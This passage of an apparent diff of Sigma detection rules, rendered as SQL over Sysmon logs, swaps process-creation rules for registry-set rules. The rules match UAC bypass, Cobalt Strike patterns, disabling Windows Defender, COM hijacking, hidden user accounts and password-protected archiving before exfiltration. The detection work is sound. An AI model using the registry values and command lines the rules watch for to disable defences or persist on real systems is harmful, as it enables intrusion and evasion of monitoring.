'.*\\{.*\\{.*\\{.*\\{.*\\{.*' AND (CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" ], - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml" }, { - "title": "Potential UAC Bypass Via Sdclt.EXE", - "id": "40f9af16-589d-4984-b78d-8c2aec023197", - "status": "test", - "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Registry Persitence via Service in Safe Mode", + "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "status": "experimental", + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", + "author": "frack113", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%sdclt.exe' ESCAPE '\\' AND IntegrityLevel = 'High')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND Details = 'Service') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_sdclt.yml" + "filename": "registry_set_add_load_service_in_safe_mode.yml" }, { - "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", - "id": "b66474aa-bd92-4333-a16c-298155b120df", + "title": "Disable Macro Runtime Scan Scope", + "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "status": "experimental", - "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", - "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_schtasks_powershell_persistence.yml" + "filename": "registry_set_disable_macroruntimescanscope.yml" }, { - "title": "Suspicious Kernel Dump Using Dtrace", - "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", - "status": "test", - "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Service Disabled", + "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "status": "experimental", + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], "falsepositives": [ - "Unknown" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND Details = 'DWORD (0x00000004)')" ], - "filename": "proc_creation_win_dtrace_kernel_dump.yml" + "filename": "registry_set_disable_windows_defender_service.yml" }, { - "title": "CobaltStrike Process Patterns", - "id": "f35c5d71-b489-4e22-a115-f003df287317", - "status": "experimental", - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", + "title": "Suspicious Printer Driver Empty Manufacturer", + "id": "e0813366-0407-449a-9869-a2db1119dc41", + "status": "test", + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%\\\\cmd.exe /C whoami%' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Temp%' ESCAPE '\\') OR ((CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\whoami.exe%' ESCAPE '\\') AND ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\runonce.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1%' ESCAPE '\\' AND (ParentCommandLine LIKE '%/C whoami%' ESCAPE '\\' OR ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR ParentCommandLine LIKE '%chrome-extension://%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND Details = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" + "filename": "registry_set_susp_printer_driver.yml" }, { - "title": "Pingback Backdoor Activity", - "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", + "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "status": "experimental", + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1574.001" + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Probable legitimate applications. If you find these please add them to an exclusion list" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%\\%appdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_pingback_backdoor.yml" + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" }, { - "title": "Mshtml DLL RunHTMLApplication Abuse", - "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "title": "Potential PowerShell Execution Policy Tampering", + "id": "fad91067-08c5-4d1a-8d8c-d96a21b37814", "status": "experimental", - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy' ESCAPE '\\') AND (Details LIKE '%Bypass%' ESCAPE '\\' OR Details LIKE '%RemoteSigned%' ESCAPE '\\' OR Details LIKE '%Unrestricted%' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + "filename": "registry_set_powershell_execution_policy.yml" }, { - "title": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", - "id": "9fbf5927-5261-4284-a71d-f681029ea574", - "status": "test", - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "author": "frack113", + "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", + "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "status": "experimental", + "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Legitimate activity is expected since compressing files with a password is common." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND CommandLine LIKE '% -p%' ESCAPE '\\' AND (CommandLine LIKE '% a %' ESCAPE '\\' OR CommandLine LIKE '% u %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_7zip_password_compression.yml" + "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" }, { - "title": "Suspicious Script Execution From Temp Folder", - "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "title": "Wow6432Node CurrentVersion Autorun Keys Modification", + "id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", "status": "experimental", - "description": "Detects a suspicious script executions from temporary folder", - "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Administrative scripts" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Image LIKE '%C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND Image LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Wow6432Node\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\\\%' ESCAPE '\\') OR (Details LIKE '%-A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\' OR Details = 'grpconv -o' OR Details LIKE '%C:\\\\Program Files%' ESCAPE '\\' AND Details LIKE '%\\\\Dropbox\\\\Client\\\\Dropbox.exe%' ESCAPE '\\' AND Details LIKE '% /systemstartup%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\\\NoExplorer' ESCAPE '\\') OR (Image LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}' ESCAPE '\\' OR TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{7037b699-7382-448c-89a7-4765961d2537}' ESCAPE '\\') AND Details LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\' AND Details LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Details LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\\\windowsdesktop-runtime-%' ESCAPE '\\') OR (Image LIKE '%\\\\VC\\_redist.x64.exe' ESCAPE '\\' AND Details LIKE '%}\\\\VC\\_redist.x64.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\ProgramData\\\\Package Cache%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\winsdksetup.exe%' ESCAPE '\\' OR Image LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' OR Image LIKE '%\\\\AspNetCoreSharedFrameworkBundle-%' ESCAPE '\\') AND Details LIKE '% /burn.runonce' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_script_exec_from_temp.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml" }, { - "title": "PowerShell Base64 Encoded Reflective Assembly Load", - "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", + "title": "Hiding User Account Via SpecialAccounts Registry Key", + "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "status": "test", - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", + "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027", - "attack.t1620" + "attack.t1564.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_powershell_base64_reflective_assembly_load.yml" + "filename": "registry_set_special_accounts.yml" }, { - "title": "Unusually Long PowerShell CommandLine", - "id": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", - "status": "test", - "description": "Detects unusually long PowerShell command lines with a length of 1000 characters or more", - "author": "oscd.community, Natalia Shornikova", + "title": "Activate Suppression of Windows Security Center Notifications", + "id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "status": "experimental", + "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.dll' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows Powershell' OR Product = 'PowerShell Core 6') AND CommandLine REGEXP '.{1000,}')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\UX Configuration\\\\Notification\\_Suppress' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_powershell_abnormal_commandline_size.yml" + "filename": "registry_set_suppress_defender_notifications.yml" }, { - "title": "Execute Pcwrun.EXE To Leverage Follina", - "id": "6004abd0-afa4-4557-ba90-49d172e0a299", + "title": "Suspicious Application Allowed Through 